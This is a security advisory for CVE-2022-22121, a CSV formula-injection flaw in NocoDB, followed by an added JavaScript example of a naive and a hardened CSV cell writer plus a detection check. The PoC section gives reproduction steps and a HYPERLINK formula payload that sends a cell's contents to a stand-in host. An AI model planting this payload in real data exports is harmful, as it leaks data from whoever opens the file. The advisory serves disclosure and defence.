
CVE-2022-22121
Date: January 10, 2022
Overview
In NocoDB, versions 0.81.0 through 0.83.8 are affected by a CSV Injection (Formula Injection) vulnerability. A low-privileged attacker can create a new table and inject payloads into its rows. When an administrator accesses the User Management endpoint, exports the data as a CSV file and opens it in a spreadsheet application, the payload is executed.
Details
NocoDB's download-as-CSV functionality fails to sanitize user-controlled cell values before writing them to the exported CSV file. A value that begins with a formula trigger character (such as "=") is written verbatim and is interpreted as a formula when the file is opened in a spreadsheet application, which is a formula injection vulnerability.
PoC Details
Sign in to the NocoDB application as a lower-privileged user (for example, an editor) and create a new table. Create a new row in that table with a cell value set to the formula injection payload shown below. Then click "Download as CSV" and open the resulting file in a spreadsheet application; the formula is evaluated and the injection is triggered.
PoC Code
=HYPERLINK("http://0.0.0.0:8000/?leak="&A1,"click")
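The failure described in the Details section is that the export writes the cell exactly as stored, so RFC 4180 quoting alone does not help: the spreadsheet unquotes the field and still sees a leading "=". The following is an added example, not NocoDB's own code, showing a naive CSV cell writer beside a hardened one and a reviewer-side check that flags cells a spreadsheet would evaluate. The table rows are constructed for the example; only the payload string comes from the advisory. The numeric exception (a signed number such as "-12.5" is left alone) is a design choice of this example, not something the advisory states.

```javascript
// Added example, not NocoDB's code: a naive CSV cell writer beside a hardened
// one, run over a constructed table whose last row carries the advisory payload.

// Leading characters that common spreadsheets treat as the start of a formula
// or a cell prefix. Tab and carriage return are included because some
// spreadsheets strip them and then evaluate what follows.
const FORMULA_TRIGGERS = new Set(['=', '+', '-', '@', '\t', '\r']);

// Plain signed numbers are not formulas; this example leaves them untouched.
const NUMERIC = /^[-+]?\d+(\.\d+)?$/;

// Naive writer: RFC 4180 quoting only. This keeps the CSV structure intact,
// but the cell still begins with "=" once the spreadsheet unquotes it.
function quoteCsvField(value) {
  const s = String(value ?? '');
  return /[",\r\n]/.test(s) ? `"${s.replace(/"/g, '""')}"` : s;
}

// True when a spreadsheet would evaluate this cell value as a formula.
function isFormulaTriggering(value) {
  const s = String(value ?? '');
  return s.length > 0 && FORMULA_TRIGGERS.has(s[0]) && !NUMERIC.test(s);
}

// Hardened writer: a triggering cell gets a leading single quote, which forces
// text interpretation, and is always double-quoted so the added quote and any
// commas or quotes inside the payload cannot alter the CSV structure.
function escapeFormulaCell(value) {
  const s = String(value ?? '');
  if (isFormulaTriggering(s)) {
    return `"'${s.replace(/"/g, '""')}"`;
  }
  return quoteCsvField(s);
}

// Serialises rows with the given cell writer; the header is row 0.
function toCsv(rows, writeCell) {
  return rows.map((row) => row.map(writeCell).join(',')).join('\r\n');
}

// Reviewer-side check: every cell an export would hand to a spreadsheet as a
// formula, with its position. Usable as a unit test on an export path.
function findFormulaCells(rows) {
  const hits = [];
  rows.forEach((row, r) => row.forEach((cell, c) => {
    if (isFormulaTriggering(cell)) hits.push({ row: r, col: c, value: String(cell) });
  }));
  return hits;
}

// Constructed sample table; PAYLOAD is the string from the advisory's PoC Code.
const PAYLOAD = '=HYPERLINK("http://0.0.0.0:8000/?leak="&A1,"click")';
const SAMPLE_ROWS = [
  ['id', 'email', 'note'],
  ['1', 'alice@example.com', 'plain text, with a comma'],
  ['2', 'bob@example.com', '-12.5'],
  ['3', 'mallory@example.com', PAYLOAD],
];

console.log('--- naive export (payload survives as a formula) ---');
console.log(toCsv(SAMPLE_ROWS, quoteCsvField));
console.log('--- hardened export (payload becomes text) ---');
console.log(toCsv(SAMPLE_ROWS, escapeFormulaCell));
console.log('--- cells flagged by the check ---');
console.log(findFormulaCells(SAMPLE_ROWS));
```

Two caveats a practitioner should keep in mind: the single quote is visible in the exported cell, which is the accepted trade-off for a text-only interpretation, and the check above is only as good as its trigger list, so an export that also targets other formats (for example XLSX, where a real formula cell type exists) needs its own handling.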
Affected Environments
0.81.0 through 0.83.8
Prevention
Update to version 0.84.0 or later.
Language: VUE
Upgrade Version
0.84.0 or later (see Prevention above)
CVSS v3 base metrics

Metric | Value
---|---
Base Score | 
Attack Vector (AV) | Network
Attack Complexity (AC) | Low
Privileges Required (PR) | Low
User Interaction (UI) | Required
Scope (S) | Unchanged
Confidentiality (C) | High
Integrity (I) | High
Availability (A) | High

CVSS v2 base metrics

Metric | Value
---|---
Base Score | 
Access Vector (AV) | Network
Access Complexity (AC) | Medium
Authentication (AU) | Single
Confidentiality (C) | Partial
Integrity (I) | Partial
Availability (A) | Partial